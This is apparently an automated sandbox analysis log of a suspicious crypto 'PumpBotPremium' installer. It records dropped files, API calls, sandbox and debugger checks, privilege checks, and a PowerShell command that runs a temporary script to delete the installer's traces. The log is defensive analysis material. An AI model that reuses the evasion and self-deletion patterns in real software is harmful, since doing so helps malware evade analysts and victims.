Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\BlockchainConnector\BlockchainConnector.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\_hashlib.pyd
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\BlockchainConnector\BlockchainConnector.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\PyQt5\QtCore.pyd
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\BlockchainConnector\BlockchainConnector.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\_tkinter.pyd
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\aipackagechainer.exe Check user administrative privileges: GetTokenInformation,DecisionNodes
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7352 Thread sleep time: -898625s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7352 Thread sleep time: -898516s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7352 Thread sleep time: -898391s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7352 Thread sleep time: -898266s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7352 Thread sleep time: -898156s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7352 Thread sleep time: -898047s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7352 Thread sleep time: -897937s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7352 Thread sleep time: -897828s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7352 Thread sleep time: -897712s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7352 Thread sleep time: -897609s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7412 Thread sleep count: 4677 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7400 Thread sleep time: -13835058055282155s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7400 Thread sleep time: -900000s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7400 Thread sleep time: -899875s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7288 Thread sleep count: 2538 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7400 Thread sleep time: -899765s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7400 Thread sleep time: -899656s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7400 Thread sleep time: -899547s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7400 Thread sleep time: -899437s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7400 Thread sleep time: -899328s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7400 Thread sleep time: -899218s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7400 Thread sleep time: -899109s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7400 Thread sleep time: -899000s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7400 Thread sleep time: -898890s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7400 Thread sleep time: -898781s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7400 Thread sleep time: -898672s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7400 Thread sleep time: -898562s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7400 Thread sleep time: -898453s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7400 Thread sleep time: -898343s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7400 Thread sleep time: -898234s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7400 Thread sleep time: -898125s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7400 Thread sleep time: -898015s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7400 Thread sleep time: -897906s >= -30000s
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Last function: Thread delayed
Source: C:\Windows\System32\msiexec.exe File Volume queried: C:\ FullSizeInformation
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\BlockchainConnector\BlockchainConnector.exe File Volume queried: C:\ FullSizeInformation
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\aipackagechainer.exe Code function: 3_2_002347C0 FindFirstFileW,GetLastError,FindClose, 3_2_002347C0
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\aipackagechainer.exe Code function: 3_2_002416D0 FindFirstFileW,FindClose,FindClose, 3_2_002416D0
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\aipackagechainer.exe Code function: 3_2_00229E30 FindFirstFileW,CloseHandle,CreateFileW,SetFilePointer,ReadFile,CloseHandle,SetCurrentDirectoryW,OpenMutexW,GetLastError,WaitForSingleObject,CloseHandle,CloseHandle,FindClose, 3_2_00229E30
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\aipackagechainer.exe Code function: 3_2_0022BF60 DeleteFileW,FindFirstFileW,FindNextFileW,FindClose,PathIsDirectoryW, 3_2_0022BF60
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\aipackagechainer.exe Code function: 3_2_002940CD FindFirstFileExW,FindNextFileW,FindClose,FindClose, 3_2_002940CD
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\aipackagechainer.exe Code function: 3_2_002545C0 FindFirstFileW,FindNextFileW,FindNextFileW,FindClose, 3_2_002545C0
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\aipackagechainer.exe Code function: 3_2_00254A00 FindFirstFileW,FindClose, 3_2_00254A00
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\aipackagechainer.exe Code function: 3_2_0024CDF0 FindFirstFileW,FindClose, 3_2_0024CDF0
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\aipackagechainer.exe Code function: 3_2_00211880 FindFirstFileW,FindNextFileW,FindClose, 3_2_00211880
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\aipackagechainer.exe Code function: 3_2_00231920 FindClose,PathIsUNCW,FindFirstFileW,GetFullPathNameW,GetFullPathNameW,FindClose,SetLastError,_wcsrchr,_wcsrchr, 3_2_00231920
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\aipackagechainer.exe Code function: 3_2_00235AD0 FindFirstFileW,FindClose, 3_2_00235AD0
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\aipackagechainer.exe Code function: 3_2_00255E50 FindFirstFileW,FindNextFileW,FindFirstFileW,FindNextFileW,FindNextFileW,FindClose, 3_2_00255E50
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\aipackagechainer.exe Code function: 3_2_002533F0 _wcsrchr,_wcsrchr,GetLogicalDriveStringsW,GetDriveTypeW,Wow64DisableWow64FsRedirection,Wow64RevertWow64FsRedirection, 3_2_002533F0
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\aipackagechainer.exe Code function: 3_2_00261680 GetCurrentProcess,GetProcessAffinityMask,GetSystemInfo,GetModuleHandleA,GetProcAddress,GlobalMemoryStatus, 3_2_00261680
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 900000
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 899884
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 899772
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 899652
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 899522
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 899373
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 899262
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 899151
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 900000
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 899888
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 899747
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 899636
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 899526
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 899377
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 899250
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 899140
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 899031
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 898921
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 898812
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 898703
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 898593
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 898484
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 898374
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 898265
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 898156
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 898046
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 897937
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 897828
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 897708
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 897578
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 897468
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 897352
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 897234
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 900000
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 899869
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 899734
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 899609
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 899500
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 899391
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 899281
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 899172
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 899062
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 898953
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 898844
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 898734
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 898625
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 898516
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 898391
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 898266
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 898156
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 898047
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 897937
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 897828
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 897712
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 897609
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 900000
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 899875
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 899765
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 899656
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 899547
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 899437
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 899328
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 899218
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 899109
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 899000
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 898890
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 898781
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 898672
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 898562
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 898453
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 898343
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 898234
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 898125
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 898015
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 897906
Source: aipackagechainer.exe, 00000003.00000002.1915356853.0000000000D3B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\+?
Source: powershell.exe, 0000000B.00000002.2057239785.0000000008422000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW4
Source: powershell.exe, 0000000B.00000002.2057239785.0000000008422000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2052852092.0000000007449000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: BlockchainConnector.exe, 00000004.00000003.1829850821.0000022D78981000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: vmncVMware Screen Codec / VMware VideoInvalid packet
Source: BlockchainConnector.exe, 00000004.00000003.1829850821.0000022D78981000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: VMware Screen Codec / VMware Video
Source: BlockchainConnector.exe, 00000007.00000002.1904081490.0000019A0BE63000.00000004.00000020.00020000.00000000.sdmp, BlockchainConnector.exe, 00000007.00000003.1894339402.0000019A0BE61000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: C:\Windows\System32\msiexec.exe Process information queried: ProcessInformation
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\aipackagechainer.exe Code function: 3_2_0027D03D IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 3_2_0027D03D
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\aipackagechainer.exe Code function: 3_2_00238550 CreateFileW,GetLastError,OutputDebugStringW,OutputDebugStringW,SetFilePointer,FlushFileBuffers,WriteFile,WriteFile,FlushFileBuffers,WriteFile,FlushFileBuffers,OutputDebugStringW,WriteFile,WriteFile,FlushFileBuffers,FlushFileBuffers,WriteFile,FlushFileBuffers,WriteFile,FlushFileBuffers, 3_2_00238550
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\aipackagechainer.exe Code function: 3_2_00237530 LoadLibraryW,GetProcAddress,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,LoadImageW,FreeLibrary, 3_2_00237530
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\aipackagechainer.exe Code function: 3_2_0027A0EE mov esi, dword ptr fs:[00000030h] 3_2_0027A0EE
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\aipackagechainer.exe Code function: 3_2_0028A795 mov ecx, dword ptr fs:[00000030h] 3_2_0028A795
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\aipackagechainer.exe Code function: 3_2_0028F94C mov eax, dword ptr fs:[00000030h] 3_2_0028F94C
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\aipackagechainer.exe Code function: 3_2_0028F990 mov eax, dword ptr fs:[00000030h] 3_2_0028F990
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\aipackagechainer.exe Code function: 3_2_0027A15A GetProcessHeap,HeapAlloc,GetProcessHeap,HeapFree, 3_2_0027A15A
Source: C:\Windows\System32\msiexec.exe Process created: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\aipackagechainer.exe "C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\aipackagechainer.exe"
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\aipackagechainer.exe Code function: 3_2_0027C207 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 3_2_0027C207
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\aipackagechainer.exe Code function: 3_2_0021C700 __set_se_translator,SetUnhandledExceptionFilter, 3_2_0021C700
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\aipackagechainer.exe Code function: 3_2_0027D03D IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 3_2_0027D03D
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\aipackagechainer.exe Code function: 3_2_0027D1D0 SetUnhandledExceptionFilter, 3_2_0027D1D0
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\aipackagechainer.exe Code function: 3_2_00281363 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 3_2_00281363
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\aipackagechainer.exe Code function: 3_2_002591C0 GetWindowsDirectoryW,GetForegroundWindow,ShellExecuteExW,ShellExecuteExW,GetModuleHandleW,GetProcAddress,GetProcessId,AllowSetForegroundWindow, 3_2_002591C0
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\aipackagechainer.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -NonInteractive -NoLogo -ExecutionPolicy RemoteSigned -Command "C:\Windows\SystemTemp\AI_D021.ps1 -paths 'C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\file_deleter.ps1','C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\aipackagechainer.exe','C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium','C:\Users\user\AppData\Roaming\Coinsw.app' -retry_count 10"
Source: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\BlockchainConnector.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "ver"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\aipackagechainer.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -noprofile -noninteractive -nologo -executionpolicy remotesigned -command "c:\windows\systemtemp\ai_d021.ps1 -paths 'c:\users\user\appdata\roaming\coinsw.app\pumpbotpremium\prerequisites\file_deleter.ps1','c:\users\user\appdata\roaming\coinsw.app\pumpbotpremium\prerequisites\aipackagechainer.exe','c:\users\user\appdata\roaming\coinsw.app\pumpbotpremium','c:\users\user\appdata\roaming\coinsw.app' -retry_count 10"
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\aipackagechainer.exe Code function: 3_2_002323D0 GetCurrentProcess,OpenProcessToken,GetLastError,GetTokenInformation,GetTokenInformation,GetLastError,GetTokenInformation,AllocateAndInitializeSid,EqualSid,FreeSid,GetLastError,CloseHandle, 3_2_002323D0
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\aipackagechainer.exe Code function: 3_2_0027CCD0 cpuid 3_2_0027CCD0
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\aipackagechainer.exe Code function: GetACP,IsValidCodePage,GetLocaleInfoW, 3_2_002965BB
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\aipackagechainer.exe Code function: GetLocaleInfoW, 3_2_002967B6
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\aipackagechainer.exe Code function: EnumSystemLocalesW, 3_2_0029685D
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\aipackagechainer.exe Code function: EnumSystemLocalesW, 3_2_002968A8
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\aipackagechainer.exe Code function: EnumSystemLocalesW, 3_2_00296943
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\aipackagechainer.exe Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW, 3_2_002969CE
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\aipackagechainer.exe Code function: GetLocaleInfoW,GetLocaleInfoW, 3_2_0025EB00
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\aipackagechainer.exe Code function: GetLocaleInfoW, 3_2_00296C21
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\aipackagechainer.exe Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP, 3_2_00296D4A
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\aipackagechainer.exe Code function: GetLocaleInfoW, 3_2_00296E50
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\aipackagechainer.exe Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW, 3_2_00296F1F
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\aipackagechainer.exe Code function: EnumSystemLocalesW, 3_2_0028D47B
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\aipackagechainer.exe Code function: GetLocaleInfoW, 3_2_0028D9C2
Source: C:\Windows\System32\msiexec.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\msiexec.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\BlockchainConnector.exe Queries volume information: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\BlockchainConnector VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\BlockchainConnector.exe Queries volume information: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\BlockchainConnector VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\BlockchainConnector.exe Queries volume information: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\BlockchainConnector VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\BlockchainConnector.exe Queries volume information: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392 VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\BlockchainConnector.exe Queries volume information: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\Crypto\Cipher\_raw_ecb.pyd VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\BlockchainConnector.exe Queries volume information: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\Crypto\Cipher\_raw_cbc.pyd VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\BlockchainConnector.exe Queries volume information: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\Crypto\Cipher\_raw_cfb.pyd VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\BlockchainConnector.exe Queries volume information: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\Crypto\Cipher\_raw_ofb.pyd VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\BlockchainConnector.exe Queries volume information: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\Crypto\Cipher\_raw_ctr.pyd VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\BlockchainConnector.exe Queries volume information: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\Crypto\Util\_strxor.pyd VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\BlockchainConnector.exe Queries volume information: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\Crypto\Hash\_BLAKE2s.pyd VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\BlockchainConnector.exe Queries volume information: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\Crypto\Hash\_SHA1.pyd VolumeInformation
